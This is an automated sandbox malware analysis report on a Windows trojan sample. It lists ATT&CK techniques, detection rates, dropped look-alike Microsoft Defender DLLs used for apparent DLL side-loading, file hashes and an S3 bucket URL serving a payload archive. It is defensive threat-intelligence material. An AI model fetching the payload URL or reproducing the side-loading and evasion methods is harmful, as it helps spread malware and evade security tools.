| Credentials | Domains | Default Accounts | 3 Command and Scripting Interpreter | 2 Windows Service | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Service Execution | 1 Registry Run Keys / Startup Folder | 2 Windows Service | 2 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 11 Process Injection | 1 Software Packing | NTDS | 35 System Information Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 Registry Run Keys / Startup Folder | 1 Timestomp | LSA Secrets | 1 Query Registry | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 131 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Masquerading | DCSync | 1 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 31 Virtualization/Sandbox Evasion | Proc Filesystem | 31 Virtualization/Sandbox Evasion | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | 11 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
          [Behavior graph] Behavior Graph ID: 1397701, Sample: 0219830219301290321012notas.exe, Startdate: 23/02/2024, Architecture: WINDOWS, Score: 76

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 0219830219301290321012notas.exe | 16% | ReversingLabs | | |
| 0219830219301290321012notas.exe | 16% | Virustotal | | Browse |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| C:\Program Files (x86)\Microsoft.NET\MpClient.dll | 100% | Joe Sandbox ML | | |
| C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll | 0% | Virustotal | | Browse |
| C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe | 0% | ReversingLabs | | |
| C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe | 0% | Virustotal | | Browse |
| C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll | 0% | Virustotal | | Browse |
| C:\Program Files (x86)\Microsoft.NET\EppManifest.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\Microsoft.NET\EppManifest.dll | 0% | Virustotal | | Browse |
| C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dll | 0% | Virustotal | | Browse |
| C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dll | 0% | Virustotal | | Browse |
| C:\Program Files (x86)\Microsoft.NET\MpClient.dll | 11% | Virustotal | | Browse |
| C:\Program Files (x86)\Microsoft.NET\MpCmdRun.dll | 7% | Virustotal | | Browse |
| C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe | 0% | ReversingLabs | | |
| C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe | 0% | Virustotal | | Browse |
| C:\Program Files (x86)\Microsoft.NET\MpCommu.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\Microsoft.NET\MpCommu.dll | 0% | Virustotal | | Browse |
| C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exe | 0% | ReversingLabs | | |
| C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exe | 0% | Virustotal | | Browse |
| C:\Program Files (x86)\Microsoft.NET\MpDetours.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\Microsoft.NET\MpDetours.dll | 0% | Virustotal | | Browse |
| C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dll | 0% | Virustotal | | Browse |
| C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exe | 0% | ReversingLabs | | |
| C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exe | 0% | Virustotal | | Browse |
| C:\Program Files (x86)\Microsoft.NET\MpEvMsg.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\Microsoft.NET\MpEvMsg.dll | 0% | Virustotal | | Browse |
| C:\Program Files (x86)\Microsoft.NET\MpOAV.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\Microsoft.NET\MpOAV.dll | 0% | Virustotal | | Browse |
| C:\Program Files (x86)\Microsoft.NET\MpProvider.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\Microsoft.NET\MpProvider.dll | 0% | Virustotal | | Browse |
| C:\Program Files (x86)\Microsoft.NET\MpRtp.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\Microsoft.NET\MpRtp.dll | 0% | Virustotal | | Browse |
| C:\Program Files (x86)\Microsoft.NET\MpSvc.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\Microsoft.NET\MpSvc.dll | 0% | Virustotal | | Browse |
| C:\Program Files (x86)\Microsoft.NET\MsMpCom.dll | 0% | ReversingLabs | | |
| C:\Program Files (x86)\Microsoft.NET\MsMpCom.dll | 0% | Virustotal | | Browse |
          No Antivirus matches
          No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://defaultcontainer/ContentPack.nuspec | 0% | Avira URL Cloud | safe | |
| http://defaultcontainer/tempfiles/sample.diff | 0% | Avira URL Cloud | safe | |
| http://defaultcontainer/tempfiles/sample.bsdiff | 0% | Avira URL Cloud | safe | |
| http://defaultcontainer/tempfiles/sample.nuspec | 0% | Avira URL Cloud | safe | |
| http://defaultcontainer/lib/net48/vcruntime140.dll | 0% | Avira URL Cloud | safe | |
| http://defaultcontainer/tempfiles/sample.exe | 0% | Avira URL Cloud | safe | |
| http://defaultcontainer/_rels/.rels | 0% | Avira URL Cloud | safe | |
| http://defaultcontainer/package/services/metadata/core-properties/63bdd4d7088c4a4c9e28aeaec7dfa81d.p | 0% | Avira URL Cloud | safe | |
| http://defaultcontainer/tempfiles/sample.dll | 0% | Avira URL Cloud | safe | |
| http://defaultcontainer/tempfiles/sample.rels | 0% | Avira URL Cloud | safe | |
| http://defaultcontainer/lib/net48/BumpFiles_ExecutionStub.exe | 0% | Avira URL Cloud | safe | |
| http://defaultcontainer/tempfiles/sample.shasum | 0% | Avira URL Cloud | safe | |
| http://defaultcontainer/lib/net48/BumpFiles.exe | 0% | Avira URL Cloud | safe | |
| http://defaultcontainer/tempfiles/sample.psmdcp | 0% | Avira URL Cloud | safe | |
| http://defaultcontainer/lib/net48/MpSvc.dll | 0% | Avira URL Cloud | safe | |
| http://schemas.openxmlformats.or | 0% | Avira URL Cloud | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| s3-r-w.sa-east-1.amazonaws.com | 3.5.232.21 | true | false | | high |
| awsserver903203232.s3.sa-east-1.amazonaws.com | unknown | unknown | false | | high |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zip | false | | high |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://github.com/myuser/myrepo | Update.exe | false | | high |
| http://defaultcontainer/tempfiles/sample.bsdiff | Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low |
| http://www.apache.org/licenses/LICENSE-2.0 | ThirdPartyNotices.txt.7.dr | false | | high |
| http://defaultcontainer/ContentPack.nuspec | Update.exe, 00000003.00000002.2050601484.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000331C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low |
| http://defaultcontainer/lib/net48/vcruntime140.dll | Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low |
| http://www.delphiforfun.org/openU | BumpFiles.exe, 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, BumpFiles.exe, 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, MpSvc.dll.3.dr | false | | high |
| http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | MpCommu.dll.7.dr | false | | high |
| http://defaultcontainer/tempfiles/sample.diff | Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low |
| https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zipINC: | BumpFiles.exe, 00000007.00000003.2064736054.0000000003456000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://defaultcontainer/tempfiles/sample.nuspec | Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low |
| https://awsserver903203232.s3.sa-east-1.amazonaws.com/ | BumpFiles.exe, 00000007.00000002.3857430328.000000000341B000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://api.github.com/# | Update.exe | false | | high |
| https://awsserver903203232.s3.sa-east-1.amazonaws.com/w | BumpFiles.exe, 00000007.00000002.3857430328.000000000341B000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zipQ | BumpFiles.exe, 00000007.00000002.3857430328.000000000341B000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://defaultcontainer/tempfiles/sample.exe | Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low |
| http://www.delphiforfun.org/ | BumpFiles.exe | false | | high |
| https://github.com/Microsoft/cpprestsdk. | ThirdPartyNotices.txt.7.dr | false | | high |
| http://defaultcontainer/_rels/.rels | Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low |
| http://defaultcontainer/package/services/metadata/core-properties/63bdd4d7088c4a4c9e28aeaec7dfa81d.p | Update.exe, 00000003.00000002.2050601484.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000331C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low |
| http://defaultcontainer/tempfiles/sample.dll | Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low |
| http://defaultcontainer/tempfiles/sample.rels | Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low |
| https://github.com/Microsoft/cpprestsdk/blob/master/license.txt) | ThirdPartyNotices.txt.7.dr | false | | high |
| http://defaultcontainer/lib/net48/BumpFiles_ExecutionStub.exe | Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low |
| http://defaultcontainer/tempfiles/sample.shasum | Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low |
| https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zipOID | BumpFiles.exe, 00000007.00000003.2064736054.0000000003456000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://defaultcontainer/lib/net48/BumpFiles.exe | Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low |
| https://awsserver903203232.s3.sa-east-1.amazonaws.com/S | BumpFiles.exe, 00000007.00000002.3857430328.000000000341B000.00000004.00000020.00020000.00000000.sdmp | false | | high |
                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdMpCommu.dll.7.drfalse
                                              high
                                              http://schemas.openxmlformats.orUpdate.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://defaultcontainer/tempfiles/sample.psmdcpUpdate.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              low
                                              http://defaultcontainer/lib/net48/MpSvc.dllUpdate.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              low
                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigestMpCommu.dll.7.drfalse
                                                high
IP | Domain | Country | ASN | ASN Name | Malicious
3.5.232.21 | s3-r-w.sa-east-1.amazonaws.com | United States | 16509 | AMAZON-02US | false
                                                Joe Sandbox version:40.0.0 Tourmaline
                                                Analysis ID:1397701
                                                Start date and time:2024-02-23 15:42:31 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 5s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Run name:Run with higher sleep bypass
Number of new started processes analysed:15
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:0219830219301290321012notas.exe
                                                Detection:MAL
                                                Classification:mal76.rans.troj.evad.winEXE@15/77@1/1
                                                EGA Information:
                                                • Successful, ratio: 75%
                                                HCA Information:Failed
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target Update.exe, PID 1992 because it is empty
                                                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                No simulations
                                                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s3-r-w.sa-east-1.amazonaws.com | 0923840932020004-3-0.exe | malicious | Unknown | 3.5.232.185
s3-r-w.sa-east-1.amazonaws.com | WKYC506_2389030007-00901003007010_777380775_#U00b2.exe | malicious | Unknown | 52.95.163.114
s3-r-w.sa-east-1.amazonaws.com | WKYC506_2389030007-00901003007010_777380775_#U00b2.exe | malicious | Unknown | 16.12.0.34
s3-r-w.sa-east-1.amazonaws.com | DOC7186723912#U0370.msi | malicious | Hidden Macro 4.0 | 52.95.164.60
s3-r-w.sa-east-1.amazonaws.com | DOC0974045396#U0370.msi | malicious | Hidden Macro 4.0 | 52.95.164.98
s3-r-w.sa-east-1.amazonaws.com | file.msi | malicious | Hidden Macro 4.0 | 52.95.164.11
s3-r-w.sa-east-1.amazonaws.com | F#U00b498074756.msi | malicious | Hidden Macro 4.0 | 52.95.164.122
s3-r-w.sa-east-1.amazonaws.com | https://dismelo.com.br | malicious | Unknown | 16.12.0.2
s3-r-w.sa-east-1.amazonaws.com | nQ6U1S5Anw.exe | malicious | Unknown | 16.12.2.46
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-02US | SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe | malicious | AgentTesla | 13.234.24.116
AMAZON-02US | https://www.smore.com/3gtzh | malicious | Unknown | 13.225.63.24
AMAZON-02US | SecuriteInfo.com.Linux.Siggen.9999.30896.24770.elf | malicious | Unknown | 34.254.182.186
AMAZON-02US | arm7-20240223-1216.elf | malicious | Mirai, Moobot | 157.175.218.236
AMAZON-02US | SecuriteInfo.com.Heur.30198.9129.msi | malicious | Unknown | 13.225.210.4
AMAZON-02US | https://qrco.de/beoXnp | malicious | HTMLPhisher | 18.238.49.52
AMAZON-02US | https://o365aqzkadahajmsditmwjlo-987555.webflow.io/ | malicious | HTMLPhisher | 13.225.214.66
AMAZON-02US | 343fV6LrhB.elf | malicious | Moobot | 34.249.145.219
AMAZON-02US | qRmUFzxtmx.elf | malicious | Moobot | 52.53.164.17
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Clipboard Hijacker, RisePro Stealer | 3.5.232.21
37f463bf4616ecd445d4a1937da06e19 | 7VAFdANAsr.exe | malicious | Unknown | 3.5.232.21
37f463bf4616ecd445d4a1937da06e19 | 7VAFdANAsr.exe | malicious | Unknown | 3.5.232.21
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Clipboard Hijacker, RisePro Stealer | 3.5.232.21
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Trojan-Banker.Win64.IcedID.er.29654.2537.msi | malicious | Unknown | 3.5.232.21
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Win32.Trojan.PSE.11SCEUB.7077.7785.exe | malicious | Unknown | 3.5.232.21
37f463bf4616ecd445d4a1937da06e19 | aol.com).eml | malicious | Unknown | 3.5.232.21
37f463bf4616ecd445d4a1937da06e19 | 4ZfJQ4Jtvf.exe | malicious | Stealc, Vidar | 3.5.232.21
37f463bf4616ecd445d4a1937da06e19 | on.js | malicious | Unknown | 3.5.232.21
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll | 0923840932020004-3-0.exe | malicious | Unknown
C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll | WKYC506_2389030007-00901003007010_777380775_#U00b2.exe | malicious | Unknown
C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll | WKYC506_2389030007-00901003007010_777380775_#U00b2.exe | malicious | Unknown
C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe | 0923840932020004-3-0.exe | malicious | Unknown
C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe | WKYC506_2389030007-00901003007010_777380775_#U00b2.exe | malicious | Unknown
C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe | WKYC506_2389030007-00901003007010_777380775_#U00b2.exe | malicious | Unknown
C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll | 0923840932020004-3-0.exe | malicious | Unknown
C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll | WKYC506_2389030007-00901003007010_777380775_#U00b2.exe | malicious | Unknown
C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll | WKYC506_2389030007-00901003007010_777380775_#U00b2.exe | malicious | Unknown
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):214352
                                                                  Entropy (8bit):6.043733758501481
                                                                  Encrypted:false
                                                                  SSDEEP:3072:wC3HjG5Tg1HlnGEx6s8Pt0TOAsdPgrjnKRKisSNm50i+B5KTedUQqm1FpCShisD:wC3OTg1AExYWCA4PeTKRKiRc5MT1vh
                                                                  MD5:573FA5E140E6B7C6209B546511DD0989
                                                                  SHA1:28BEFE7EF26AE909FEB74AC4A8C9981BED192A93
                                                                  SHA-256:BA543F2CF16CB1D1CFA87D7531E6045581EE76274C36D0C9DF8C131E05B86977
                                                                  SHA-512:6E43E60743207E0C50B42BAAAF0DE71F544B579292F7907360BE0926C56C74D06CAA4E7BC0ABF5AA857400D8A573BF820905F0B9283C26EE5CD2E0E3320736BF
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Joe Sandbox View:
                                                                  • Filename: 0923840932020004-3-0.exe, Detection: malicious, Browse
                                                                  • Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse
                                                                  • Filename: WKYC506_2389030007-00901003007010_777380775_#U00b2.exe, Detection: malicious, Browse
                                                                  Reputation:low
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:C source, ASCII text, with very long lines (769), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):9398
                                                                  Entropy (8bit):4.899071819784544
                                                                  Encrypted:false
                                                                  SSDEEP:192:0kJH/0e6Y/WnPqLO0OKcie0lmkLgJsJ+LjtU+J3I:FBf6Yyf09MnkEeAu
                                                                  MD5:1FC6F870588FEF1B38BA900026BE8828
                                                                  SHA1:6075BC55198D9A0D75A4D7DB20B7B2D8AD47A466
                                                                  SHA-256:A24DD47738189CA55A5137A49FD1246418BC1C589A4294B79DFCC4D2A79C9098
                                                                  SHA-512:530A02081ECFBAB6AB59C904874C604263975174626980BFE445371540E999754A2DD204A003D79C8F7E5FF1D5C420E2CB93BF36B527DFBF774638FE923B62D8
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:// AmMonitoringInstall.mof : mof source for Malware class..//..// Copyright (c) Microsoft Corporation. All rights reserved...//..// This file will be processed by MOFCOMP utility to..// register the provider with the WMI repository...//....#pragma autorecover....#pragma namespace ("\\\\.\\root\\Microsoft\\SecurityClient")....////////////////////////////////////////////////////////..// Declare WMI class : Malware..////////////////////////////////////////////////////////....[.. Description("Describes malware detected by Forefront Antimalware"): ToInstance ToSubClass, .. dynamic: DisableOverride ToInstance,.. provider("AntimalwareMonitoringProvider"): ToInstance ToSubClass..]..class Malware: SerializableToXml..{.. string SchemaVersion = "1.0.0.0"; // derived from SerializableToXml.. .. [.. Description("Detection time in the Round-Trip Format"): ToInstance ToSubClass, .. read: ToInstance ToSubClass.. ].. string DetectionTime;.. .. [.. Desc
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:C source, ASCII text, with very long lines (769), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):21004
                                                                  Entropy (8bit):4.9286194529785705
                                                                  Encrypted:false
                                                                  SSDEEP:192:HMVlF4ajQGgTGB6r+WApyLaNFeRUTqp1CljVU2kplI5NLO060YeVwa6wplCSJddn:YD4cQGgyBV7clIi0JFMSvG4k+
                                                                  MD5:EAA6FC46125F59D04BCBB6122817B41E
                                                                  SHA1:72436F84D76486D2D1F824E6BC0D3BD47D1CB2E7
                                                                  SHA-256:67191020D74AE8400F875238E494AAF5D28EEFEC7EFE1D1D20D2DB068D5E35D6
                                                                  SHA-512:77F7DE790509CEE5D288CE9DAFB3D100E9DB8F343D5D8380E1B0EDC441D3CC0666C8ECF30DE7910FA701A54C62897ACC169F46885AEEC02B78FC1BA91FE07A80
                                                                  Malicious:false
                                                                  Preview:// AmStatusInstall.mof : mof source for Antimalware Status provider..//..// Copyright (c) Microsoft Corporation. All rights reserved...//..// This file will be processed by MOFCOMP utility to..// register the provider with the WMI repository..//....#pragma autorecover....#pragma namespace ("\\\\.\\root\\Microsoft\\SecurityClient")....////////////////////////////////////////////////////////..// Declare class : AntimalwareHealthStatus..////////////////////////////////////////////////////////..[.. provider("AntimalwareHealthStatusProv"): ToInstance ToSubClass, .. singleton: DisableOverride ToInstance ToSubClass, .. dynamic: DisableOverride ToInstance, .. Description("This is a singleton that represents the Microsoft Antimalware service status"): ToInstance ToSubClass..]..class AntimalwareHealthStatus: ProtectionTechnologyStatus..{.. string SchemaVersion = "1.0.0.1"; // derived from SerializableToXml.... string Name = "Antimalware"; // derived from ProtectionTechnologySta
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:C source, ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):2460
                                                                  Entropy (8bit):4.767342366558364
                                                                  Encrypted:false
                                                                  SSDEEP:48:FiDRPfReZei3Q9Cf9haZCX0doQkAvVTIUH9:8Db2V3Q9CFhaZCX0doXAvVTIUH9
                                                                  MD5:6FE3967E8035358D369C83FA72400006
                                                                  SHA1:A2F9F0D1667431185B3E4E74ED47EDB9CF76A2F9
                                                                  SHA-256:29EFFB537FBC7C0CF869E61BFA5262CF7A7301604298E44373A637585C3504C7
                                                                  SHA-512:0C31F1A0E111A918C763AB30EA9BF2E889BEFDE1A63AA8511F5DC11D7D3C48AA1B25F27513881E32C4E22598BA648958D67B10B7221CAF863DEFD17657A28A02
                                                                  Malicious:false
                                                                  Preview:// ClientWMIUninstall.mof : ..//..// Copyright (c) Microsoft Corporation. All rights reserved...//..// This file will be processed by MOFCOMP utility to..// install Microsoft Security Client classes to the WMI repository..//....#pragma autorecover....#pragma namespace("\\\\.\\root\\Microsoft")....instance of __Namespace..{.. Name = "SecurityClient" ;..};....#pragma namespace ("\\\\.\\root\\Microsoft\\SecurityClient")....class Win32_ProviderEx : __Win32Provider..{.. [.. Description("Hosting Model, provides compatibility with Windows XP and Windows Server .NET. Do not override."),.. Override("HostingModel").. ].. string HostingModel = "LocalServiceHost";.. .. [.. Description("..."),.. Override("SecurityDescriptor").. ] .. string SecurityDescriptor; .. .. UInt32 version = 1;..};......[.. abstract: ToInstance, .. Description("This is a base abstract class that might be serialized to XML"): ToInstance ToSubClass..]..class Seria
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):296280
                                                                  Entropy (8bit):6.091659225748971
                                                                  Encrypted:false
                                                                  SSDEEP:6144:0WEUBaI5gV/c/JjDX8lv/FJlo3zMfPoL4qpBW/7DZe/pS:1VoVkhjDXS/rK4qpAFe0
                                                                  MD5:828221391F701B2CD7D1BF772A5B369E
                                                                  SHA1:E3C6679E9AA43B0A92841E36B4B2352599AA3437
                                                                  SHA-256:545F9356969C1D50E6FA0DEF359900F84553A7FDA29EDC55693CDE8B399E52BB
                                                                  SHA-512:988F7FA7A802A97C63D4AFA0D71434666179A7B73EA778332F4A77201551129F23B3C214526FA296C8B6BD688325044AFC734929E1AA94E4E58C79976F7FB14F
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Joe Sandbox View:
                                                                  • Filename: 0923840932020004-3-0.exe, Detection: malicious, Browse
